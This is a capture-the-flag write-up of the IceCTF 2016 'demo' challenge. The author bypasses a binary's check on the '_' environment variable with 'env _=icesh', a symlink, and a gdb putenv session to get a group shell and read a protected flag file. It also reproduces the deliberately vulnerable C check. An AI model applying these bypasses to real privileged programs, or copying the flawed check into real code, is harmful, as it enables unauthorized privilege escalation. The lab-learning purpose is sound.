This is a writeup for the demo challenge in IceCTF 2016.
Opening the challenge, we get:
"I found this awesome premium shell, but my demo version just ran out... can you help me crack it? /home/demo/ on the shell"
Let's see what /home/demo holds. Looking into the directory, we find the following files:
demo.c
demo
flag.txt
Makefile
flag.txt most likely holds the flag for this task and is surely not readable with our permissions.
demo.c would suggest C source code, cool.
demo is most likely our "premium shell".
Makefile, no idea about this.
Trying to read flag.txt proves our assumption correct:
cat flag.txt
Permission denied
A quick check on the permissions of flag.txt:
ls -l flag.txt
-rw-r--r-- 1 root demo -- flag.txt
OK, no question about it: our user cannot read the file, so we need to read it through the premium shell.
Next, let's run the premium shell and see what we get.
./demo
I'm sorry, your free trial has ended.
Let's take a sneak peek at the source code of the demo:
cat demo.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <libgen.h>
#include <string.h>
void give_shell() {
gid_t gid = getegid();
setresgid(gid, gid, gid);
system("/bin/sh");
}
int main(int argc, char *argv[]) {
if(strncmp(basename(getenv("_")), "icesh", 6) == 0){
give_shell();
}
else {
printf("I'm sorry, your free trial has ended.\n");
}
return 0;
}
So the program reads the environment variable "_", takes the last path component of it with basename(), and compares that against "icesh". The shell sets "_" to the path it used to invoke the command (for ./demo that is "./demo", whose basename is "demo"), which is why the check fails when we simply run it. strncmp() with a length of 6 compares the five letters plus the terminating NUL, so the component has to be exactly "icesh"; then strncmp returns 0, 0 == 0 holds and give_shell() runs. give_shell() copies the effective group ID into the real one with setresgid() before calling system("/bin/sh"), so the spawned shell keeps whatever effective group the demo binary runs with instead of dropping it. Nothing here stops the caller from choosing the value of "_" (or from naming the executable whatever they like), and that is the whole bug.
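To pin down exactly what that check accepts, here is an added example of my own; it is not the challenge's demo.c. It reproduces the unlock decision as a function that takes the value of "_" as a parameter, so it can be fed constructed inputs, adds a contrasting check against /proc/self/exe, and wraps both in a harmless stand-in binary that prints the decision instead of spawning a shell. The names demo_unlocks, exe_name_unlocks, last_component and the stand_in binary name are my own choices.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Last path component without modifying its argument (basename(3) from
 * libgen.h is allowed to write into the buffer it is given). */
static const char *last_component(const char *path)
{
    const char *slash = strrchr(path, '/');
    return slash ? slash + 1 : path;
}

/* demo.c's decision, with the value of "_" passed in instead of read via
 * getenv() so it can be exercised with constructed inputs.
 * strncmp(..., 6) covers the five letters plus the NUL terminator, so only an
 * exact "icesh" unlocks: "icesh2" and "ices" both fail. The NULL guard is the
 * one addition: demo.c hands getenv()'s NULL straight to basename() and
 * crashes if "_" is unset (e.g. when started by something other than a shell). */
int demo_unlocks(const char *underscore)
{
    if (underscore == NULL)
        return 0;
    return strncmp(last_component(underscore), "icesh", 6) == 0;
}

/* What a program that refuses to trust "_" (or argv[0], which is just as
 * caller-controlled) could consult instead: the kernel's record of the
 * executable actually running, /proc/self/exe. A symlink or "env _=icesh"
 * no longer helps, because the link is resolved to the real file name.
 * Linux only, and a hard link named icesh would still pass, so this narrows
 * the bypass rather than fixing the design flaw of gating privilege on a name. */
int exe_name_unlocks(void)
{
    char buf[4096];
    ssize_t n = readlink("/proc/self/exe", buf, sizeof buf - 1);
    if (n < 0)
        return 0;
    buf[n] = '\0';
    return strncmp(last_component(buf), "icesh", 6) == 0;
}

/* Stand-in for demo that prints what demo would decide instead of spawning
 * a shell. Build it as stand_in, then try the shell-side tricks against it:
 *   ./stand_in                                        -> trial ended ($_ is ./stand_in)
 *   env _=icesh ./stand_in                            -> demo's check unlocked
 *   ln -s "$PWD/stand_in" /tmp/icesh && /tmp/icesh    -> demo's check unlocked
 * In all three cases the /proc/self/exe check stays locked. */
int main(void)
{
    const char *u = getenv("_");
    printf("$_ = %s\n", u ? u : "(unset)");
    printf("demo's check        : %s\n",
           demo_unlocks(u) ? "unlocked, demo would run /bin/sh here"
                           : "I'm sorry, your free trial has ended.");
    printf("/proc/self/exe check: %s\n", exe_name_unlocks() ? "unlocked" : "locked");
    return 0;
}
```

The env route works because bash sets "_" to /usr/bin/env for the env process, and env then puts our own "_=icesh" into the environment it hands to the program; the symlink route works because bash sets "_" to the full pathname it used to invoke the command, /tmp/icesh, whose basename is exactly "icesh". Both are the same flaw the gdb session exploits, just without a debugger.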
I decided to give gdb a go. I'm not too familiar with this tool yet, but that is not an issue: we are here to learn.
After some online investigation I found out how to call a function inside the running process and change the environment variable. I loaded demo into gdb:
gdb demo
After this I set a breakpoint at main so the process stops right after it starts:
(gdb) break main
Start the demo:
(gdb) run
Then, with the process stopped at the breakpoint, I set the environment variable to the value of our choice:
(gdb) call putenv("_=icesh")
Continue running:
(gdb) continue
And at this point we were given the shell! Blam!
$
Now we should be able to read flag.txt:
$ cat flag.txt
IceCTF{wH0_WoUld_3vr_7Ru5t_4rgV}
$
Flag recovered and submitted.
All in all an interesting challenge, and it made me look up information about gdb; I'm still learning to use it comprehensively. The best challenges are the ones that make you research the subject and are completed afterwards.